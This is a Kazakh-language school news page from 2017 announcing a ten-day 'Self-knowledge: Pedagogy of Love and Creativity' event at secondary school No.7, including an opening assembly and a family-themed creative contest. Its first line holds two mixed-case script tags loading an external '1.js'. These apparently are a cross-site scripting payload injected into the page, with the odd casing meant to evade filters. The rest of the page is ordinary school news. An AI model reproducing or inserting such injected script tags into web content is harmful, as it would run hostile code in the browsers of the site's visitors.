<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.02.2017

"Өзін-өзі тану: Сүйіспеншілік пен Шығармашылық

педагогикасы" онкүндігі

         Ақпанның 2-сінен

13-не дейін №7 орта мектепте "Өзін-өзі тану: Сүйіспеншілік пен

Шығармашылық педагогикасы" дәстүрлі онкүндігі өтеді. Онкүндік аясында

барлық сынып оқушылар, ата-аналар мен мұғалімдер қатыса алатын әртүрлі қызықты

іс-шаралар жоспарланып отыр.

         Онкүндіктің салтанатты ашылуы мектепішілік жиынның

болуымен басталды. Онда 1-8 сынып оқушылары

белсенді қатысты. "Бумеранг добра" атты бейнебаян көрсетілді, ең

белсенді оқушылар мейірімділік, бейбітшілік туралы өздерінің сүйікті өлеңдерін оқыды.

     5-ші сыныптар арасында "Менің отбасым" тақырыбына шығармашылық сайыс өтті. Байқаудың

мақсаты отбасылық шығармашылықты және мектеп пен отбасының әрекеттестігін

дамыту, ата-анаға деген сүйіспеншілік және құрмет сезімін, өз отбасына мақтаныш сезімін тәрбиелеу.

Жауапты: өзін-өзі тану пәнінің мұғалімдері Абилькасимова А.Ж. и Жусубалина М.М.

Просмотров: 1078


Пікір қосу



Деректерді қолтаңбаға қосу